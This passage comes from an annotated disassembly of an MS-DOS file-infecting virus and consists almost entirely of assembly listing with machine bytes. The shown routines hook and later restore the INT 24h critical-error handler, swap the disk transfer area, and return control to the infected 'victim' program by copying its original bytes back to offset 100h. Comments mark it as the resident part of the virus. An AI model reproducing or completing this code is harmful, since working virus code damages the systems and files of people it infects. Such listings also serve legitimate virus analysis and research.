||
|
|
||
|
; exit after any error
|
||
|
|
||
|
05C2 58 POP AX
|
||
|
05C3 8F069803 POP [0398]
|
||
|
05C7 C3 RET
|
||
|
|
||
|
05C8 20 00 ; file attributes
|
||
|
05CA D8A8 ; file time stamp
|
||
|
05CC D516 ; file date stamp
|
||
|
|
||
|
;-----------------------------------------
|
||
|
; intercept INT 24h and prepare local DTA
|
||
|
|
||
|
; get INT 24h
|
||
|
|
||
|
05CE B82435 MOV AX,3524 ; get INT 24h
|
||
|
05D1 E8B1FD CALL 0385 ; far call to INT 21h
|
||
|
|
||
|
05D4 891EB203 MOV [03B2],BX
|
||
|
05D8 8C06B403 MOV [03B4],ES
|
||
|
|
||
|
; set new INT 24h
|
||
|
|
||
|
05DC B425 MOV AH,25 ; set
|
||
|
05DE B024 MOV AL,24 ; int 24h
|
||
|
05E0 BAB603 MOV DX,03B6 ; offset of new handler
|
||
|
05E3 E89FFD CALL 0385 ; far call to INT 21h
|
||
|
|
||
|
; get current DTA
|
||
|
|
||
|
05E6 B42F MOV AH,2F ; get DTA
|
||
|
05E8 E89AFD CALL 0385 ; far call to INT 21h
|
||
|
|
||
|
05EB 8C069C03 MOV [039C],ES
|
||
|
05EF 891E9A03 MOV [039A],BX
|
||
|
|
||
|
; set new local DTA
|
||
|
|
||
|
05F3 B41A MOV AH,1A ; set DTA
|
||
|
05F5 0E PUSH CS
|
||
|
05F6 1F POP DS
|
||
|
05F7 8B169803 MOV DX,[0398]
|
||
|
05FB 81C28000 ADD DX,0080
|
||
|
05FF E883FD CALL 0385 ; far call to INT 21h
|
||
|
|
||
|
0602 C3 RET
|
||
|
|
||
|
;-------------------------
|
||
|
; restore INT 24h and DTA
|
||
|
|
||
|
; prepare registers
|
||
|
|
||
|
0603 0E PUSH CS
|
||
|
0604 1F POP DS
|
||
|
0605 0E PUSH CS
|
||
|
0606 07 POP ES
|
||
|
|
||
|
; restore INT 24h
|
||
|
|
||
|
0607 B82425 MOV AX,2524 ; set INT 24h
|
||
|
060A 8B16B203 MOV DX,[03B2]
|
||
|
060E 8E1EB403 MOV DS,[03B4]
|
||
|
0612 E870FD CALL 0385 ; far call to INT 21h
|
||
|
|
||
|
; retsore DTA
|
||
|
|
||
|
0615 8B169A03 MOV DX,[039A]
|
||
|
0619 FF369C03 PUSH [039C]
|
||
|
061D 1F POP DS
|
||
|
061E B41A MOV AH,1A
|
||
|
0620 E862FD CALL 0385 ; far call to INT 21h
|
||
|
|
||
|
0623 C3 RET
|
||
|
|
||
|
;---------------------
|
||
|
; exit to application
|
||
|
|
||
|
0624 E8DCFF CALL 0603 ; restore INT 24h and DTA
|
||
|
|
||
|
0627 0E PUSH CS
|
||
|
0628 1F POP DS
|
||
|
0629 BE3E06 MOV SI,063E ; start of oryginal code
|
||
|
062C 8B3E9803 MOV DI,[0398] ; length of victim
|
||
|
|
||
|
; copy victim code
|
||
|
|
||
|
0630 AC LODSB
|
||
|
0631 AA STOSB
|
||
|
0632 81FE6906 CMP SI,0669
|
||
|
0636 75F8 JNZ 0630
|
||
|
|
||
|
0638 8B3E9803 MOV DI,[0398] ; RET address
|
||
|
063C 57 PUSH DI
|
||
|
063D C3 RET
|
||
|
|
||
|
063E B96906 MOV CX,0669
|
||
|
0641 81E90001 SUB CX,0100
|
||
|
0645 8B369803 MOV SI,[0398]
|
||
|
0649 2BF1 SUB SI,CX
|
||
|
064B 0E PUSH CS
|
||
|
064C 1F POP DS
|
||
|
064D BF0001 MOV DI,0100
|
||
|
0650 AC LODSB
|
||
|
0651 AA STOSB
|
||
|
0652 E2FC LOOP 0650
|
||
|
|
||
|
0654 33C0 XOR AX,AX
|
||
|
0656 33DB XOR BX,BX
|
||
|
0658 33C9 XOR CX,CX
|
||
|
065A 33D2 XOR DX,DX
|
||
|
065C 33F6 XOR SI,SI
|
||
|
065E BF0001 MOV DI,0100
|
||
|
0661 57 PUSH DI
|
||
|
0662 33FF XOR DI,DI
|
||
|
0664 33ED XOR BP,BP
|
||
|
0666 C3 RET
|
||
|
|
||
|
0667 90 NOP
|
||
|
0668 90 NOP
|
||
|
|
||
|
; end resident part of virus
|
||
|
;-----------------------------
|
||
|
; victim code
|
||
|
|